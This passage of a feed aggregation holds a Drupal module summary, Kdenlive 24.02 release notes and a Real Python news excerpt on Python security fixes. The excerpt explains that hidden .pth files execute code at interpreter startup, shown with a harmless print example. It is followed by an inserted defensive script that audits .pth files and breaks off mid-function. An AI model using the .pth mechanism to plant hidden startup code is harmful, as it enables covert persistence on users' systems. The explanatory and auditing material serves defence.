    • How old: created in Apr 2018 by Mike Priscella (mpriscella), though recent releases are by Mark Dorison (markdorison) of Chromatic
    • Versions available: 8.x-1.10
  • Maintainership
    • Actively maintained, latest release just over a month ago
    • Security coverage
    • Test coverage
    • Number of open issues: 18, 8 of which are bugs
  • Usage stats:
    • 3,001 sites
  • Module features and usage
    • With this module enabled, the form to configure fields for your content types will have a new checkbox labeled “Required on Publish”
    • Check this new box instead of the normal “Required field” checkbox to have the field only required if the content is being published or already published
    • Useful for publishing workflows where you want content creators to be able to quickly get started on content, but ensure that fields will be filled in before publishing
    • Useful for fields that will optimize the content for SEO, social sharing, search, and so on

Kdenlive 24.02.0 released

Planet KDE - Mon, 2024-03-11 12:52

The team is thrilled to introduce the much-anticipated release of Kdenlive 24.02, featuring a substantial upgrade to our frameworks with the adoption of Qt6 and KDE Frameworks 6. This significant under-the-hood transformation establishes a robust foundation, shaping the trajectory of Kdenlive for the next decade. The benefits of this upgrade are particularly noteworthy for Linux users, as improved Wayland support enhances the overall experience. Additionally, users on Windows, MacOS, and Linux will experience a substantial performance boost since Kdenlive now runs natively on DirectX, Metal, and Vulkan respectively, replacing the previous abstraction layer reliance on OpenGL and Angle, resulting in a more efficient and responsive application. This upgrade brings significant changes to packaging, featuring the introduction of a dedicated package for Apple Silicon, the discontinuation of PPA support and an enhanced method for installing the Whisper and Vosk speech-to-text engines.

While a significant effort has been invested in providing a stable user experience in this transition, we want to acknowledge that, like any evolving software, there might be some rough edges. Some known issues include: themes and icons not properly applied in Windows and AppImage, text not properly displayed in clips in the timeline when using Wayland and a crash in the Subtitle Manager under MacOS. Worth noting also is the temporary removal of the audio recording feature pending its migration to Qt6. We appreciate your understanding and encourage you to provide feedback in this release cycle so that we can continue refining and improving Kdenlive. In the upcoming release cycles (24.05 and 24.08), our development efforts will concentrate on stabilizing any remaining issues stemming from this upgrade. We’ll also prioritize short-term tasks outlined in our roadmap, with a specific emphasis on enhancing performance and streamlining the effects workflow.

In terms of performance enhancements, this release introduces optimized RAM usage during the import of clips into the Project Bin. Furthermore, it addresses Nvidia encoding and transcoding issues with recent ffmpeg versions.

To safeguard project integrity, measures have been implemented to prevent corruptions. Projects with non-standard and variable frame rates are not allowed to be created. When rendering a project containing variable frame rate clips, users will receive a warning with the option to transcode these clips, mitigating potential audio-video synchronization issues.

Users can now enjoy the convenience of an automatic update check without an active network connection. Glaxnimate animations now default to the rawr format, replacing Lottie. Furthermore, we’ve introduced an FFv1 render preset to replace the previously non-functional Ut Video. And multiple project archiving issues have been fixed.

Beyond performance and stability we’ve managed to sneak in several nifty quality-of-life and usability improvements, the highlights include:

Subtitles

This release introduces multiple subtitle support, allowing users to conveniently choose the subtitle from a drop-down list in the track header.

A subtitle manager dialog has been implemented to facilitate the import and export of subtitles.

Now, in the Import Subtitle dialog, you have the option to create a new subtitle instead of replacing the previous one.

Speech-to-Text

The Speech Editor, our text-based editing tool that enables users to add clips to the timeline from selected texts, now includes the option to create new sequences directly from the selected text.

Effects

The initial implementation of the long awaited easing interpolation modes for keyframes has landed. Expected soon are easing types (ease in, ease out and ease in and out) and a graph editor.

The Gaussian Blur and Average Blur filters are now keyframable.

Rendering

Added the option to set an interpolation method for scaling operations on rendering.

Quality-of-Life and Usability

Added the option to apply an effect to a group of clips by simply dragging the effect onto any clip within the group.

Conveniently move or delete selected clips within a group using the Alt + Select option.

Added a toggle button to clips with effects to easily enable/disable them directly from the timeline.

Added list of last opened clips in Clip Monitor’s clip name.

Added the ability to open the location of the rendered file in the file manager directly from the render queue dialog.

The Document Checker has been completely rewritten following the implementation of sequences. Now, when you open a project, Kdenlive checks if all the clips, proxies, sequences, and effects are loaded correctly. If any errors are spotted, Kdenlive seamlessly sorts them out in the project files, preventing any possible project corruptions.

Added the ability to trigger a sound notification when rendering is complete.

Full changelog
  • Fix multitrack view not exiting for some reason on tool switch (Qt6). Commit.
  • Fix qml warnings. Commit.
  • Show blue audio/video usage icons in project Bin for all clip types. Commit. See issue #1816
  • Multiple fixes for downloaded effect templates: broken link in effect info, empty name, cannot edit/delete. Commit.
  • New splash for 24.02. Commit.
  • Subtitles: add session id to tmp files to ensure 2 concurrent versions of a project don’t share the same tmp files. Commit. Fixes bug #481525
  • Fix title clip font’s weight lost between Qt5 and Qt6 projects. Commit.
  • Fix audio thumbnail not updated on replace clip in timeline. Commit. Fixes issue #1828
  • Refactor mouse position in the timeline to fix multiple small bugs. Commit. Fixes bug #480977
  • Subtitle import: disable ok button when no file is selected, only preview the 30 first lines. Commit.
  • Fix wrong clip dropped on timeline when subtitle track is visible. Commit. See bug #481325
  • Fix track name text color on Qt6. Commit.
  • Ensure we don’t mix title clips thumbnails (eg. in duplicated clips). Commit.
  • Fix scopes and titler bg on Win/Mac. Commit.
  • Fix incorrect item text. Commit.
  • Fix extract frame from video (fixes titler background, scopes, etc). Commit.
  • Make AVFilter average and gaussian blur keyframable. Commit.
  • Ensure we always load the latest xml definitions for effects. Commit.
  • Fix composition paste not correctly keeping a_track. Commit.
  • Ensure custom keyboard shortcuts are not deleted on config reset. Commit.
  • Fix crash after changing toolbar config: ensure all factory()->container actions are rebuild. Commit.
  • Try to fix white monitor on undock/fullscreen on Windows / Mac. Commit.
  • Fix sequence copy. Commit. See bug #481064
  • Fix pasting of sequence clips to another document messing clip ids. Commit.
  • Fix python package detection, install in venv. Commit. See issue #1819
  • Another pip fix. Commit.
  • Fix typos in venv pip. Commit.
  • Venv: ensure the python process are correctly started. Commit.
  • Add avfilter dblur xml description to fix param range. Commit.
  • Fix typo. Commit.
  • Correctly ensure pip is installed in venv. Commit.
  • Fix undocked widgets don’t have a title bar to allow moving / re-docking. Commit.
  • Ensure pip is installed inside our venv. Commit.
  • Fix Qt6 dragging clips with subtitle track visible. Commit. Fixes bug #480829
  • Subtitle items don’t have a grouped property – fixes resize bug. Commit. See bug #480383
  • Fix Shift + resize subtitle affecting other clips. Commit.
  • Speech to text : switch to importlib instead of deprecated pkg_resources. Commit.
  • Multi guides export: replace slash and backslash in section names to fix rendering. Commit. Fixes bug #480845
  • Fix moving grouped subtitles can corrupt timeline if doing an invalid move. Commit.
  • Fix sequence corruption on project load. Commit. Fixes bug #480776
  • Fix sort order not correctly restored, store it in project file. Commit. Fixes issue #1817
  • Ensure closed timeline sequences have a transparent background on opening. Commit. Fixes bug #480734
  • Fix Arrow down cannot move to lower track if subtitles track is active. Commit.
  • Enforce refresh on monitor fullscreen switch (fixes incorrectly placed image). Commit.
  • Fix audio lost when replacing clip in timeline with speed change. Commit. Fixes issue #1815
  • Fix duplicated filenames or multiple uses not correctly handled in archiving. Commit. Fixes bug #421567. Fixes bug #456346
  • Fix multiple archiving issues. Commit. Fixes bug #456346
  • Do not hide info message on render start. Commit.
  • Fix Nvidia transcoding. Commit. See issue #1814
  • Fix possible sequence corruption. Commit. Fixes bug #480398
  • Fix sequences folder id not correctly restored on project opening. Commit.
  • Fix duplicate sequence not creating undo entry. Commit. See bug #480398
  • Fix drag clip at beginning of timeline sometimes loses focus. Commit.
  • Fix luma files not correctly checked on document open, resulting in change to luma transitions. Commit. Fixes bug #480343
  • [CD] Run macOS Qt5 only on manual trigger. Commit.
  • Fix group move corrupting undo. Commit. Fixes bug #480348
  • Add FFv1 render preset to replace non working utvideo. Commit.
  • Fix possible crash on layout switch (with Qt in debug mode), fix mixer label overlap. Commit.
  • Hide timeline clip effect button on low zoom. Commit. Fixes issue #1802
  • Fix subtitles not covering transparent zones. Commit. Fixes bug #480350
  • Group resize: don’t allow resizing a clip to length < 1. Commit. Fixes bug #480348
  • Luma fixes: silently autofix luma paths for AppImage projects. Try harder to find matching luma in list, create thumbs in another thread so we don’t block the ui. Commit.
  • Fix crash cutting grouped overlapping subtitles. Don’t allow the cut anymore, add test. Commit. Fixes bug #480316
  • Remove unused var. Commit.
  • Effect stack: don’t show drop marker if drop doesn’t change effect order. Commit.
  • Try to fix crash dragging effect on Mac. Commit.
  • Another try to fix monitor offset on Mac. Commit.
  • Optimize some of the timeline qml code. Commit.
  • Fix DocumentChecker model directly setting items and incorrect call to columnCount() in index causing freeze in Qt6. Commit.
  • Fix clip monitor not updating when clicking in a bin column like date or description. Commit. Fixes bug #480148
  • Ensure we also check “consumer” producers on doc opening (playlist with a different fps). Commit.
  • Fix glaxnimate animation not parsed by documentchecker, resulting in empty animations without warn if file is not found. Commit.
  • Fix NVidia encoding with recent FFmpeg. Commit. See issue #1814
  • Fix clip name offset in timeline for clips with mixes. Commit.
  • Better way to disable building lumas in tests. Commit.
  • Don’t build lumas for tests. Commit.
  • Fix Mac compilation. Commit.
  • Fix data install path on Windows with Qt6. Commit.
  • Fix ridiculously slow recursive search. Commit.
  • Fix start playing at end of timeline. Commit. Fixes bug #479994
  • Try to fix mac monitor vertical offset. Commit.
  • Don’t display useless link when effect category is selected. Commit.
  • Fix save clip zone from timeline adding an extra frame. Commit. Fixes bug #480005
  • Fix clips with mix cannot be cut, add test. Commit. Fixes issue #1809. See bug #479875
  • Fix cmd line rendering. Commit.
  • Windows: fix monitor image vertical offset. Commit.
  • Fix project monitor loop clip. Commit.
  • Add test for recent sequence effect bug. Commit. See bug #479788
  • Fix tests (ensure we don’t try to discard a task twice). Commit.
  • Blacklist MLT Qt5 module when building against Qt6. Commit.
  • Fix monitor offset when zooming back to 1:1. Commit.
  • Fix sequence effects lost. Commit. Fixes bug #479788
  • Avoid white bg label in status bar on startup. Commit.
  • Fix qml warnings. Commit.
  • Fix clicking on clip fade indicator sometimes creating a 2 frames fade instead of defined duration. Commit.
  • Improved fix for center crop issue. Commit.
  • Fix center crop adjust not covering full image. Commit. Fixes bug #464974
  • Fix various Qt6 mouse click issues in monitors. Commit.
  • Disable Movit until it’s stable (should have done that a long time ago). Commit.
  • Fix Qt5 startup crash. Commit.
  • Add time to undo action text. Commit.
  • Fix cannot save list of project files. Commit. Fixes bug #479370
  • Add missing license info. Commit.
  • [Nightly Flatpak] Replace Intel Media SDK by OneVPL Runtime. Commit.
  • [Nightly Flatpak] Fix and update python deps. Commit.
  • [Nightly Flatpak] Switch to Qt6. Commit.
  • Fix editing title clip with a mix can mess up the track. Commit. Fixes bug #478686
  • Use Qt6 by default, fallback to Qt5. Commit.
  • Fix audio mixer cannot enter precise values with keyboard. Commit.
  • [CI] Require tests with Qt6 too. Commit.
  • Add FreeBSD Qt6 CI. Commit.
  • Apply i18n to percent values. Commit.
  • Show GPU in debug info. Commit.
  • Prevent, detect and possibly fix corrupted project files, fix feedback not displayed in project notes. Commit. Fixes issue #1804. See bug #472849
  • [nightly Flatpak] Add patch to fix v4l-utils. Commit.
  • Update copyright to 2024. Commit.
  • [nightly flatpak] fix v4l-utils once more. Commit.
  • [nightly Flatpak] v4l-utils uses meson now. Commit.
  • Don’t crash on first run. Commit.
  • [nightly flatpak] Try to fix v4l-utils. Commit.
  • [nightly flatpak] Cleanup. Commit.
  • Get rid of dropped QtGraphicalEffects. Commit.
  • Fix qml warnings. Commit.
  • Qt6: fix subtitle editing in timeline. Commit.
  • Fix subtitles crashing on project load (incorrectly setting in/out snap points). Commit.
  • Test project’s active timeline is not always the first sequence. Commit.
  • Ensure secondary timelines are added to the project before being loaded. Commit.
  • Ensure autosave is not triggered when project is still loading. Commit.
  • Show GPU name in Wizard. Commit.
  • Avoid converting bin icons to/from QVariant. Commit.
  • [Nightly Flatpak] Update deps. Commit.
  • Fix Qt6 audio / video only clip drag broken from clip monitor. Commit.
  • Fix rubber select incorrectly moving selected items when scrolling the view. Commit.
  • Port away from jobclasses KIO header. Commit.
  • Fix variable name shadowing. Commit.
  • When switching timeline tab without timeline selection, don’t clear effect stack if it was showing a bin clip. Commit.
  • Fix crash pressing del in empty effect stack. Commit.
  • Ensure check for HW accel is also performed if some non essential MLT module is missing. Commit.
  • Fix closed sequences losing properties, add more tests. Commit.
  • Don’t attempt to load timeline sequences more than once. Commit.
  • Fix “Sequence from selection” with single track. Commit.
  • Refactor code for paste. Commit.
  • Fix timeline groups lost after recent commit on project save. Commit.
  • Ensure we always use the correct timeline uuid on some clip operations. Commit.
  • Qt6: fix monitor image vertical offset. Commit.
  • Always keep all timeline models opened. Commit. See bug #478745
  • Add animation: remember last used folder. Commit. See bug #478688
  • Fix KNS KF6 include. Commit.
  • Add missing include. Commit.
  • Refresh effects list after downloading an effect. Commit.
  • Fix crash searching for effect (recent regression). Commit.
  • Fix audio or video only drag of subclips. Commit. Fixes bug #478660
  • Fix editing title clip duration breaks title (recent regression). Commit.
  • Glaxnimate animations: use rawr format instead of Lottie by default. Commit. Fixes bug #478685
  • Effect Stack: remove color icons, fix mouse wheel seeking while scrolling. Commit. See issue #1786
  • Fix timeline focus lost when dropping an effect on a clip. Commit.
  • Disable check for removable devices on Mac. Commit.
  • [CD] Use Qt6 templates instead of custom magic. Commit.
  • Fix type in Purpose KF version check. Commit.
  • Fix dropping lots of clips in Bin can cause freeze on abort. Commit.
  • Right click on a mix now shows a mix menu (allowing deletion). Commit. Fixes bug #442088
  • Don’t add mixes to disabled tracks. Commit. See bug #442088
  • Allow adding a mix without selection. Commit. See bug #442088
  • Fix proxied playlist clips (like stabilized clips) rendered as interlaced. Commit. Fixes bug #476716
  • [CI] Try different approach for macOS signing. Commit.
  • [CI] Signing test, explicitly source env for now. Commit.
  • Camcorder proxies: ensure we have the same count of audio streams and if not, create a new proxy with audio from original clip (Fixes Sony FX6 proxies). Commit.
  • Fix typo. Commit. Fixes issue #1800
  • [CI] Re-enable Flatpak. Commit.
  • [CI] More fixes for the signing test. Commit.
  • [CI] Fixes for the signing test. Commit.
  • [CI] Add macOS signing test. Commit.
  • [CI] Fix pipeline after recent renaming upstream. Commit.
  • Qml warning fixes. Commit.
  • Add subtitle manager to project menu. Commit.
  • Fix groups tests. Commit.
  • Fix transparency lost on rendering nested sequences. Commit. Fixes bug #477771
  • Fix guides categories not applied on new document. Commit. Fixes bug #477617
  • Fix selecting several individual items in a group. Commit.
  • Add import/export to subtitle track manager. Commit.
  • Drag & drop of effect now applies to all items in a group. Commit. See issue #1327
  • New: select an item in a group with Alt+click. You can then perform operations on that clip only: delete, move. Commit. See issue #1327
  • Consistency: activating an effect in the effects list now consistently applies to all selected items (Bin or Timeline). Commit.
  • Cleanup assets link to documentation. Commit.
  • Check MLT’s render profiles for missing codecs. Commit. See bug #475029
  • Various fixes for python setup. Commit.
  • Fix Qt6 compilation. Commit.
  • Fix incorrectly placed ifdef. Commit.
  • Start integrating some of the new MLT keyframe types. Commit.
  • Various fixes for python venv install. Commit.
  • Fix missing argument in constructor call. Commit.
  • Fix crash on auto subtitle with subtitle track selected. Commit.
  • Fix python install stuck. Commit.
  • Improve timeline clip effect indicator. Commit. See issue #445
  • Work/multisubtitles. Commit.
  • Fix some issues in clip monitor’s last clip menu. Commit.
  • Various fixes and improved feedback for Python venv, add option to run STT on full project. Commit.
  • Text corrections. Commit.
  • Fix typos. Commit.
  • If users try to render a project containing variable framerate clips, show a warning and propose to transcode these clips. Commit.
  • Fix qml warning (incorrect number of args). Commit.
  • Fix qt6 timeline drag. Commit.
  • Flatpak: Use id instead of app-id. Commit.
  • Fix audio stem export. Commit.
  • Add link to our documentation in the effects/composition info. Commit.
  • Qt6: fix monitor background and a few qml mouse issues. Commit.
  • Rename ObjectType to KdenliveObjectType. Commit.
  • We need to use Objective C++ for MetalVideoWidget. Commit.
  • When pasting clips to another project, disable proxies. Commit. Fixes issue #1785
  • Remove unneeded lambda capture. Commit.
  • Fix monitor display on Windows/Qt6. Commit.
  • Cleanup readme and flatpak nightly manifests. Commit.
  • [Nightly Flatpak] Do not build tests. Commit.
  • Fix tests broken by last commit. Commit.
  • Add list of last opened clips in Clip Monitor’s clip name. Commit.
  • Add Craft Jobs for Qt6. Commit.
  • [CI] Switch to new template include format. Commit.
  • [CI] Add reuse-lint job. Commit.
  • Chore: REUSE linting for compliance. Commit.
  • Don’t check for cache space on every startup. Commit.
  • Don’t allow creating profile with non standard and non integer fps from a clip. Commit. See issue #476754
  • Remove unmaintained changelog file. Commit.
  • Automatically check for updates based on the app version (no network connection at this point). Commit.
  • Fix project duration for cli rendering. Commit.
  • Fix clips with missing proxy incorrectly loaded on project opening. Commit.
  • Fix compilation with KF < 5.100. Commit.
  • Add undo redo to text based edit. Commit.
  • Check and remove circular dependencies in tractors. Commit. Fixes bug #471359
  • Hide resize handle on tiny clips with mix. Commit.
  • Fix minor typos. Commit.
  • Adapt to new KFileWidget API. Commit.
  • Fix mix not always deleted when moving grouped clips on same track. Commit.
  • Fix python venv for Windows. Commit.
  • Fix timeremap. Commit.
  • Fix replace clip keeping audio index from previous clip, sometimes breaking audio. Commit. See bug #476612
  • Create sequence from selection: ensure we have enough audio tracks for AV groups. Commit.
  • Fix timeline duration incorrect after create sequence from timeline selection. Commit.
  • Add a Saving Successful event, so people can easily play a sound or show a popup on save if wanted. Commit. See issue #1767
  • Fix project duration not updating when moving the last clip of a track to another non last position. Commit. See bug #476493
  • Update file kdenlive.notifyrc. Commit.
  • Duplicate .notifyrc file to have both KF5 and KF6 versions. Commit.
  • Don’t lose subtitle styling when switching to another sequence. Commit. Fixes bug #476544
  • Port from deprecated ksmserver calls. Commit.
  • Allow aborting clip import operation. Commit.
  • Ensure no urls are added to file watcher when interrupting a load operation. Commit.
  • Fix crash dropping url to Library. Commit.
  • When dropping multiple files in project bin, improve import speed by not checking if every file is on a remote drive. Commit.
  • Fix titler shadow incorrectly pasted on selection. Commit. Fixes bug #476393
  • Sequences folder now has a colored icon and is always displayed on top. Commit.
  • Fix Qt5 compilation. Commit.
  • Fix Qt5 compilation take 3. Commit.
  • Fix Qt5 compilation take 2. Commit.
  • Fix Qt5 compilation. Commit.
  • Fix some Qt6 reported warnings. Commit.
  • Fix pasted effects not adjusted to track length. Commit.
  • Python virtual env: Add config tab in the Environment Settings page, minor fixes for the dependencies checks. Commit.
  • [Qt6] We need to link to d3d on Windows. Commit.
  • Convert license headers to SPDX. Commit.
  • Use pragma once for new monitor code. Commit.
  • Fix Qt6 build on Windows. Commit.
  • Text based edit: add font zooming and option to remove all silence. Commit.
  • Move venv to standard xdg location (.local/share/kdenlive). Commit.
  • Whisper now has word timings. Commit.
  • Use python venv to install modules. Commit.
  • Fix timeline preview ignored in temporary data dialog. Commit. Fixes bug #475980
  • Improve debug output for tests. Commit.
  • Correctly prefix python scripts, show warning on failure to find python. Commit.
  • Qt6 Monitor support. Commit.
  • Speech to text: fix whisper install aborting after 30secs. Commit.
  • Don’t try to generate proxy clips for audio with clipart. Commit.
  • Clip loading: switch to Mlt::Producer probe() instead of fetching frame. Commit.
  • Multiple fixes for time remap losing keyframes. Commit.
  • [CI] Increase per test timeout. Commit.
  • Add secondary color correction xml with renamed alphasp0t effect, fix effectgroup showing incorrect names. Commit.
  • Add png with alpha render profile. Commit. See issue #1605
  • Fix Mix not correctly deleted on group track move. Commit. See issue #1726
  • Cleanup commented code. Commit.
  • Fix setting default values is never executed. Commit.
  • Cleanup param insert and placeholder replacement. Commit.
  • Move render argument creation to a function. Commit.
  • Move project init logic out of renderrequest. Commit.
  • Use projectSceneList() for both cli and gui rendering. Commit.
  • Use active timeline for rendering. Commit.
  • Adapt to KBookmarkManager API change. Commit.
  • Small cleanup. Commit.
  • Properly initialize projectItemModel and bin playlist on render request. Commit.
  • Revert “Properly initialize projectItemModel and bin playlist on render request”. Commit.
  • Fix for renamed frei0r effects. Commit.
  • Fix rendering with alpha. Commit.
  • Rotoscoping: don’t auto add a second kfr at cursor pos when creating the initial shape, don’t auto add keyframes until there are 2 keyframes created. Commit.
  • Fix description --render-async flag. Commit.
  • Fix keyframe param not correctly enabled when selecting a clip. Commit.
  • Fix smooth keyframe path sometimes incorrectly drawn on monitor. Commit.
  • Allow setting the default interpolation method for scaling operations on rendering. Commit. Fixes issue #1766
  • Don’t attempt to replace clip resource if proxy job was not completely finished. Commit. Fixes issue #1768
  • Properly initialize projectItemModel and bin playlist on render request. Commit.
  • Rename render params, don’t load project twice. Commit.
  • Remove accelerator on timeline tab rename. Commit. Fixes issue #1769
  • Print render errors for cli rendering too. Commit.
  • Minor cleanup. Commit.
  • Improve exit code on failure. Commit.
  • [cli rendering] Fix condition for subtitle. Commit.
  • Show documentchecker warning only if relevant. Commit.
  • Fix printing of documentchecker results. Commit.
  • [cli renderer] Ensure x265 params are calculated. Commit.
  • Custom clip job: allow using current clip’s frame as parameter. Commit.
  • Properly adjust timeline clips on sequence resize. Commit.
  • Remove unused debug stuff. Commit.
  • Fix project duration not correctly updated on hide / show track. Commit.
  • Custom clip jobs: handle lut file as task output. Commit.
  • Allow renaming a timeline sequence by double clicking on its tab name. Commit.
  • Fix resize clip with mix test. Commit.
  • Fix resize clip start to frame 0 of timeline not correctly working in some zoom levels. Commit.
  • Remember Clip Monitor audio thumbnail zoom & position for each clip. Commit.
  • Asset List: ensure favorite are shown using a bold font. Commit.
  • Fix asset list using too much height. Commit.
  • Switch Effects/Compositions list to QWidget. Commit.
  • Drop unused and deprecated qmlmodule QtGraphicalEffects. Commit.
  • Fix warning. Commit.
  • Fix multiple audio streams broken by MLT’s new astream property. Commit. Fixes bug #474895
  • Custom clip jobs: ensure we never use the same output name if several tasks are started on the same job. Commit.
  • Custom clip jobs: ensure script exists and is executable. Commit.
  • Fix dialogs not correctly deleted, e.g. add track dialog, causing crash on exit. Commit.
  • Ensure clips with audio (for example playlists) don’t block audio when inserted on video track. Commit.
  • Ensure translations cannot mess with file extensions. Commit.
  • Fix another case blocking separate track move. Commit.
  • Fix grabbed clips cannot be moved on upper track in some cases. Commit.
  • Final blocks for enabling render test suite: add synchronous option to exit only after rendering is finished, add option for render preset (use H264 as default). Commit.
  • Implement #1730 replace audio or video of a bin clip in timeline. Commit.
  • Fix cppwarning. Commit.
  • Fix move clip part of a group on another track not always working. Commit.
  • Fix playlist count not correctly updated, allowing to delete last sequence. Commit. Fixes bug #474988
  • Fix motion-tracker Nano file name and links to the documentation. Commit.
  • Stop installing kdenliveui.rc also as separate file, next to Qt resource. Commit.
  • Library: add action to open a library file in a File manager. Commit.
  • Fix tests and possible corruption in recent mix fix. Commit.
  • Correctly highlight newly dropped files in library. Commit.
  • Fix threading issue crashing in resource widget. Commit. Fixes issue #1612
  • Fix freeze on adding mix. Commit. See issue #1751
  • Make Lift work as expected by most users. Commit. Fixes bug #447948. Fixes bug #436762
  • Fix load task discarding kdenlive settings (caused timeline clips to miss the “proxy” icon). Commit.
  • Fix multiple issues with Lift/Gamma/Gain undo. Commit. Fixes bug #472865. Fixes bug #462406
  • Fix freeze / crash on project opening. Commit.
  • Correctly update effect stack when switching timeline tab. Commit.
  • Drop timeline guides, in favor of sequence clip markers. Commit.
  • Optimize RAM usage by not storing producers on which we did a get_frame operation. Commit.
  • Fix guide multi-export adding an extra dot to the filename. Commit.
  • Open the recursive search from the project file location. Commit.
  • Inform user about time spent on recursive search. Commit.
  • Allow open contained folder in job queue dialog. Commit.
  • Read input and output from command line. Commit.
  • Correctly process configurable render params. Commit.
  • Fix crash on subclip transcoding. Commit. Fixes issue #1753
  • Fix audio extract for multi stream clips. Commit.
  • Correctly set render params for headless rendering. Commit.
  • Ensure some basic parts are built with headless rendering. Commit.
  • Remove unneeded setting of CMake policies, implied by requiring 3.16. Commit.
  • Fix detection/fixing when several clips in the project use the same file. Commit.
  • Render widget: show warning if there is a missing clip in the project. Commit.
  • DocumentChecker: Enable recursive search for clips with proxy but missing source. Commit.
  • Fix rnnoise effect parameters and category. Commit.
  • Fix minor typo. Commit.
  • Fix zone rendering not remembered when reopening a project. Commit.
  • Add missing test file. Commit.
  • Various document checker fixes: fix display update on status change, allow sorting in dialog, hide recreate proxies if source is not available, add test for missing proxy. Commit.
  • Project Bin: don’t draw icon frame if icon size is null. Commit.
  • Fix clips with empty resource not detected by our documentchecker code. Commit.
  • Fix document checker dialog not enabling ok after removing problematic clips. Commit.
  • Document checker dialog: fix selection, allow multiple selection, limit color background and striked out text to a specific column. Commit.
  • Show fade value on drag. Commit. Fixes issue #1744
  • If copying an archived file fails, show which file failed in user message. Commit.
  • Don’t incorrectly treat disabled proxy (-) as missing. Commit. Fixes issue #1748
  • Fix minor typo. Commit.
  • Fix box_blur xml. Commit.
  • Add new “preserve alpha” option to box blur. Commit.
  • Transcoding: add option to replace clip in project (disabled for timeline sequence clips). Commit. See issue #1747
  • Add notr="true" for text that should not be translated. Commit.
  • When an MLT playlist proxy is missing, it should be reverted to a producer, not stay in a chain. Commit.
  • Adapt to kbookmarks API change. Commit.
  • Adapt to KNotifications API change. Commit.
  • Try to auto fix path of LUT files on project opening. Commit.
  • Automatically fix missing fonts (like before). Commit.
  • Remove unused ManageCapturesDialog. Commit.
  • [DCResolverDialog] Improve UI. Commit.
  • Fix recursive search and “use placeholder”. Commit.
  • [REUSE] Remove duplicated entry in dep5. Commit.
  • Chore(REUSE): Further linting. Commit.
  • Chore(REUSE): Add headers in data/effects/update. Commit.
  • Chore(REUSE): Add headers in src/ui. Commit.
  • Chore(REUSE): Add missing licence texts. Commit.
  • Chore(reuse): Add missing IP info. Commit.
  • Chore(REUSE): Add SPDX info to CMakelists.txt files. Commit.
  • Add missing include (fix qt6 build). Commit.
  • Don’t duplicate KF_DEP_VERSION + remove unused REQUIRED_QT_VERSION. Commit.
  • Fix configure qt6. Commit.
  • [ColorWheel] Show real color in slider instead of black and white. Commit. See issue #1405
  • Add QColorUtils::complementary. Commit.
  • Add some accessibility names for testing. Commit.
  • Add option to export guides as FFmpeg chapter file. Commit. See bug #451936
  • [Rendering] Further restructuring. Commit.
  • [DocumentResource] Fix workflow with proxies. Commit.
  • Try to fix tests. Commit.
  • [DocumentChecker] Fix and polish after refactoring. Commit.
  • [DocumentChecker] Refactor code to split logic and UI. Commit.
  • [DocumentChecker] Start to split UI and backend code. Commit.
  • Add our mastodon on apps.kde.org. Commit.
  • Fix typo not installing renderer. Commit.
  • Fix tests. Commit.
  • Delete unused var. Commit.
  • Initial (yet hacky) cli rendering. Commit.

The post Kdenlive 24.02.0 released appeared first on Kdenlive.

Categories: FLOSS Project Planets

Real Python: Python News: What's New From February 2024

Planet Python - Mon, 2024-03-11 10:00

As February takes a rare leap forward with an extra day this year, the Python community followed suit!

Python versions 3.12 and 3.11 receive a security fix, and CPython source distributions now document the software supply chain to allow for a more effective vulnerability detection. Another Rust-based tool makes its way into the Python ecosystem, promising exciting improvements to the existing package management system.

Looking ahead, the reveal of the PyCon US 2024 schedule gives us a glimpse into the upcoming Python conference. In other news, the Python Software Foundation launches recurring Office Hours to enhance community support in the Grants Program.

Let’s dive into the biggest Python news from the past month!

Python 3.12 and 3.11 Receive a Security Fix

The Python 3.12.2 and Python 3.11.8 patch versions were released, incorporating hundreds of commits and a host of bug fixes. Aside from that, they both provide a small security fix to an obscure feature of Python that allows for arbitrary code execution.

In a nutshell, this new security fix forbids the processing of hidden path configuration files (.pth) located in a virtual environment’s site-packages/ folder:

venv/
│
├── bin/
│
├── include/
│
├── lib/
│   │
│   └── python3.12/
│       │
│       └── site-packages/
│           │
│           └── .your-hidden.pth
│
├── lib64/
│
└── pyvenv.cfg

On a Unix-like operating system, any file becomes implicitly hidden when its name starts with a leading dot. On Windows, a file needs the corresponding attribute set to be hidden. Note that the directory structure presented above might look slightly different on Windows.

Path configuration files are plain text files that the site module in the Python standard library automatically parses and processes upon the interpreter startup. Historically, these files helped facilitate editable installs and implement hooks into the importing machinery. They essentially let you append extra folders to the Python search path, which is accessible through the sys.path variable.

Unfortunately, .pth files have a quirk that makes it possible to execute any code on startup:

venv/lib/python3.12/site-packages/.your-hidden.pth:

import os; print("This will run on Python startup!")

Read the full article at https://realpython.com/python-news-february-2024/ »
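A defensive check for the behaviour described above, as an added example that is not from the Real Python article: it lists the .pth files in a site-packages directory, flags hidden ones, and reports the lines the site module would execute (those beginning with import followed by a space or tab). The function names, verdict labels and sample files are constructed for illustration; the script only reads files and never executes their content.

```python
"""Audit a site-packages directory for .pth files that run code at startup."""
import stat
import sys
import tempfile
from pathlib import Path


def is_hidden(path):
    """True if hidden by a leading dot (Unix) or a hidden flag/attribute (macOS, Windows)."""
    if path.name.startswith("."):
        return True
    st = path.lstat()
    flags = getattr(st, "st_flags", 0)            # present on BSD/macOS
    attrs = getattr(st, "st_file_attributes", 0)  # present on Windows
    return bool(flags & getattr(stat, "UF_HIDDEN", 0)) or bool(
        attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0)
    )


def executable_lines(pth_file):
    """Lines the site module passes to exec(): 'import' followed by a space or tab."""
    text = pth_file.read_text(encoding="utf-8", errors="replace")
    return [ln.rstrip() for ln in text.splitlines()
            if ln.startswith(("import ", "import\t"))]


def audit_site_dir(site_dir):
    """Return one finding per .pth file: name, hidden flag, exec lines, verdict."""
    findings = []
    for path in sorted(Path(site_dir).iterdir()):
        if not (path.is_file() and path.name.endswith(".pth")):
            continue
        hidden = is_hidden(path)
        lines = executable_lines(path)
        if hidden and lines:
            verdict = "suspicious"   # code that runs at startup from a file kept out of sight
        elif hidden or lines:
            verdict = "review"       # hidden path entry, or visible startup code
        else:
            verdict = "ok"           # only appends directories to sys.path
        findings.append({"file": path.name, "hidden": hidden,
                         "exec_lines": lines, "verdict": verdict})
    return findings


def build_sample_site_dir(root):
    """Create a constructed site-packages directory with three sample .pth files."""
    site_dir = Path(root) / "site-packages"
    site_dir.mkdir(parents=True)
    # Constructed sample: a plain path entry, as used by editable installs.
    (site_dir / "editable_demo.pth").write_text(
        "/home/dev/projects/demo/src\n", encoding="utf-8")
    # Constructed sample: a visible file with a startup hook.
    (site_dir / "hook_demo.pth").write_text(
        "# comment lines are ignored\nimport sys; sys.dont_write_bytecode = True\n",
        encoding="utf-8")
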